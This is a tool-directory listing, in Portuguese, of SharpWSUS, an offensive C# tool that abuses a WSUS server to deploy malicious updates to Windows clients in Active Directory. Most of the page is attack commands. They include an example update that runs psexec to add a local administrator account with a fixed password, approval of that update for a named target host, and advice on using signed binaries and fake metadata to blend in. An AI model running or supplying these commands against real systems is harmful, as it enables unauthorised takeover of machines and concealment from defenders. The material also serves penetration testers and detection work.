Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpWSUS — Ferramenta em C# para movimento lateral através do WSUS criando, aprovando e implantando atualizações maliciosas para clientes Windows alvo em ambientes Active Directory. | Kitploit
Ferramentas/GitHubGitHub/nettitude/sharpwsus
Movimento LateralTestes de PenetraçãoRed Teaming
GitHubnettitude/sharpwsus

SharpWSUS

Ferramenta em C# para movimento lateral através do WSUS criando, aprovando e implantando atualizações maliciosas para clientes Windows alvo em ambientes Active Directory.

Ver Repositório
50380há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SharpWSUS

SharpWSUS é uma ferramenta em CSharp para movimento lateral através do WSUS. Existe um blog correspondente (https://labs.nettitude.com/blog/introducing-sharpwsus/) que possui informações mais detalhadas sobre a ferramenta, caso de uso e detecção.

Créditos

Muitos créditos aos recursos abaixo que realmente fizeram 90% disso para mim. Esta ferramenta é apenas um aprimoramento dos abaixo para confiabilidade e flexibilidade de C2.

  • https://github.com/AlsidOfficial/WSUSpendu - ferramenta powershell para abusar do WSUS
  • https://github.com/ThunderGunExpress/Thunder_Woosus - ferramenta Csharp para abusar do WSUS

Menu de Ajuda

root@kitploit:~
 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team


Comandos listados abaixo possuem parâmetros opcionais entre <>.

Localizar o servidor WSUS:
    SharpWSUS.exe locate

Inspecionar o servidor WSUS, enumerando clientes, servidores e grupos existentes:
    SharpWSUS.exe inspect

Criar uma atualização (NOTA: O payload precisa ser um binário assinado pelo Windows):
    SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MSRC] /description:[description] /url:[url]>

Aprovar uma atualização:
    SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>

Verificar status de uma atualização:
    SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

Excluir atualização e limpar grupos adicionados:
    SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>

Exemplo de Uso

root@kitploit:~
sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

Notas

  • O binário precisa ser assinado pelo Windows, então psexec, msiexec, msbuild etc podem ser úteis para movimento lateral.
  • Os metadados no comando create não são necessários, mas são úteis para se misturar no ambiente.
  • Se estiver testando em um laboratório, o primeiro geralmente é rápido, então cada atualização subsequente levará algumas horas (isso se deve à forma como o Windows avalia se uma atualização já está instalada ou não)
Baixar ferramenta